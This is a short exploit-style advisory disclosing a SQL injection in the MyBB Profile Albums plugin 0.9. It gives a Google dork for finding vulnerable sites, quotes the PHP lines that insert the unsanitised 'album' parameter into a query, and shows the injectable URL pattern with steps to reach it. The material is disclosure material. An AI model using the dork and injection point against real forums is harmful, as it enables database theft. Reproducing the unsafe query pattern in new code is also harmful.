# Exploit Title: Profile Albums MyBB plugin SQL Injection 0day # Google Dork: inurl:albums.php intext:"powered by Mybb" # Date: 14.10.2012 # Exploit Author: Th3FreakPony # Software Link: http://mods.mybb.com/view/profilealbums # Version: 0.9 # Tested on: Linux. ---------------------------------------------- The vulnerabillity exist within albums.php : <? /*Line 69*/ $aid = $mybb->input['album']; /*Line 86*/ $query_add_breadcrumb = $db->simple_select("albums", "*", "aid='".$aid."'"); ?> /albums.php?action=editimage&image=[Vaild_ID]&album=[Vaild_album_ID][SQLi] (You need to create a new account && upload album and images) ---------------------------------------------- Image : http://i.imgur.com/yeAx0.png Follow: https://twitter.com/PonyBlazeБрой прочитания на тази страница: 3708
MyBB Profile Albums Plugin 0.9 (albums.php, album parameter) SQL Injection